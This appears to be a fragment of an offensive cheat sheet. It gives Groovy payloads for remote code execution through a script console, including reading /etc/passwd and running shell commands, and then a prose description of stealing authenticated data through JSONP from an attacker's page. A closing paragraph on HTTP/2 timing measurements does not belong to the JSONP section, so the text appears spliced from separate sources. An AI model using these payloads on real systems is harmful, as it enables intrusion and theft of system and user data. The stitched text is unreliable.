```groovy
// Read a file line by line
new File("/etc/passwd").withReader('UTF-8') { reader ->
    def line
    while ((line = reader.readLine()) != null) {
        println "${line}"
    }
}
```
RCE
```groovy
// Run a command and print its output
def process = "ls -lah".execute()
println "${process.text}"
```
```groovy
// Same, but capture stdout/stderr separately and kill the process after a timeout
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ls -lah'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "$sout"
```
JsonP
Only useful if a JSONP endpoint requires authentication. A victim browsing attacker.com will fetch the data from victim.com with the victim's cookies attached, because of how JSONP works (Reference: https://www.sjoerdlangkemper.nl/2019/01/02/jsonp/).
The idea is to use HTTP/2 to send multiple requests in one, which allows measuring the difference by looking at which response comes back first. Repeat this many times to get some statistical relevance.